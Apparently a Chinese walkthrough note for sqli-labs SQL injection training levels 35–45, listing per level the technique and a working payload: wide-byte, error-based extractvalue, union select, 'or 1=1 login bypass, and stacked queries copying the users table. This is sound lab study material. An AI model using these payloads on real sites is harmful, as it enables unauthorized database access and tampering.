sqllab第35-45关通关笔记

35关知识点:
  • 宽字节注入
  • 数值型注入
  • 错误注入
    • payload:id=1+and+extractvalue(1,concat(0x7e,database(),0x7e))=0--+
  • 联合注入
    • payload:id=0+union+select+1,database(),version()--+
36关知识点:
  • 字符型注入
  • 宽字节注入
  • 错误注入
    • payload:id=1%df%27and+extractvalue(1,concat(0x7e,database(),0x7e))=0--+
  • 联合注入
    • payload:id=0%df%27union+select+1,database(),version()--+
37关知识点:
  • 宽字节注入(bp抓包实现,不要直接在输入框中输入下面payload)
  • 字符型注入
  • 联合注入
    • payload:uname=1%df'union+select+database(),version()--+
  • 错误注入
    • payload:uname=1%df'and+extractvalue(1,concat(0x7e,database(),0x7e))--+
38关知识点:
  • 字符型注入+单引号闭合
  • 错误注入
    • payload:id=1%27and+extractvalue(1,concat(0x7e,database(),0x7e))=%271
  • 联合注入
    • payload:id=0%27union+select+1,database(),version()--+
39关知识点:
  • 数值型注入
  • 错误注入
    • payload:id=1+and%20extractvalue(1,concat(0x7e,database(),0x7e))=0
  • 联合注入
    • payload:id=0+union+select+1,version(),database()
40关知识点:
  • 字符型注入
    • 测试发现原始语句是 where id=('输入')
  • 联合注入
    • payload:id=0%27)union+select+1,database(),3%20and+1=(%271
  • 没有回显信息,不能进行错误注入
41关知识点:
  • 数值型注入
  • 联合注入
    • payload:id=0%20union+select+1,database(),version()
  • 没有回显信息,不能进行错误注入
  • 堆叠注入
    • payload:id=1;create%20table%20ren(id%20int);--+
42关知识点:
  • 密码位置可以单引号绕过
    • payload:passwd='or+1=1#
  • 堆叠注入
    • payload:passwd=';create table ren like users;# (创建一个新表ren,格式和users一样)
    • payload:passwd=';insert into ren select * from users;# (将users的内容插入到ren表中)
43关知识点:
  • 密码处读取输入为 where passwd=('输入')
    • payload:passwd=1')or 1=1#
  • 堆叠注入
    • payload:passwd=');create table ren like users;# (创建一个新表ren,格式和users一样)
    • payload:passwd=');insert into ren select * from users;# (将users的内容插入到ren表中)
44关知识点:
  • 和42关的payload一模一样
  • 直接过了
45关知识点:
  • 和43关一样的payload
  • 直接过了

10

相关推荐
oneouto2 小时前
selenium学习笔记(二)
笔记·学习·selenium
sealaugh322 小时前
aws(学习笔记第十九课) 使用ECS和Fargate进行容器开发
笔记·学习·aws
LuH11244 小时前
【论文阅读笔记】Scalable, Detailed and Mask-Free Universal Photometric Stereo
论文阅读·笔记
m0_748256786 小时前
WebGIS实战开源项目:智慧机场三维可视化(学习笔记)
笔记·学习·开源
红色的山茶花6 小时前
YOLOv9-0.1部分代码阅读笔记-loss.py
笔记
胡西风_foxww8 小时前
【es6复习笔记】Promise对象详解(12)
javascript·笔记·es6·promise·异步·回调·地狱
吉大一菜鸡14 小时前
FPGA学习(基于小梅哥Xilinx FPGA)学习笔记
笔记·学习·fpga开发
CCSBRIDGE16 小时前
Magento2项目部署笔记
笔记
亦枫Leonlew17 小时前
微积分复习笔记 Calculus Volume 2 - 5.1 Sequences
笔记·数学·微积分
爱码小白17 小时前
网络编程(王铭东老师)笔记
服务器·网络·笔记